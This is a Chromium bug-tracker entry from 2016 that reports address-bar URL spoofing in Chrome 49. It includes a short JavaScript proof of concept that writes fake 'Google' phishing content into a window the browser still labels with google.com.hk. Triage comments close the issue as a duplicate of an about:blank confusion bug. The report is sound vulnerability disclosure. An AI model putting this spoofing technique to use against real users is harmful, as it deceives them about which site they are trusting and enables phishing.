
Issue 609722

Starred by 1 user

Issue metadata

Status: Duplicate
Merged: issue 466422
Owner: ----
Closed: May 2016
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security




Security: Google Chrome Browser 49.0.2623.110 m - Address Bar URL Spoofing

Reported by junjian2...@gmail.com, May 6 2016

Issue description

Google Chrome Browser - Address Bar URL Spoofing

Chrome Browser Version: 49.0.2623.110 m

POC:


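<SCRIPT LANGUAGE="JavaScript">
function winopen()
{
	// Get a handle to the window named "newwindow" (created by the link click below) without loading a URL.
	OW=window.open("", "newwindow");
	// Write page-supplied content into that window's document.
	OW.document.write("<TITLE>Google</TITLE>");
	OW.document.write("<h1>The Phishing Page !!</h1>");
	OW.document.close();
}
</SCRIPT>
<!-- Clicking the link navigates the window "newwindow" to google.com.hk and runs winopen() 1 ms later. -->
<a href="https://www.google.com.hk/" target="newwindow" onclick="setTimeout('winopen()', 1);">Google Home Page</a>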





 
Attachment: poc.html (439 bytes)

Comment 1 by f...@chromium.org, May 6 2016

Components: Security>UX
Labels: -Restrict-View-SecurityTeam
Mergedinto: 466422
Status: Duplicate (was: Unconfirmed)
Thanks for the report. This appears to leverage the confusion over about:blank windows, which is being worked on in https://bugs.chromium.org/p/chromium/issues/detail?id=466422.
Labels: allpublic
Components: -Security>UX
Labels: Team-Security-UX
Security>UX component is deprecated in favor of the Team-Security-UX label
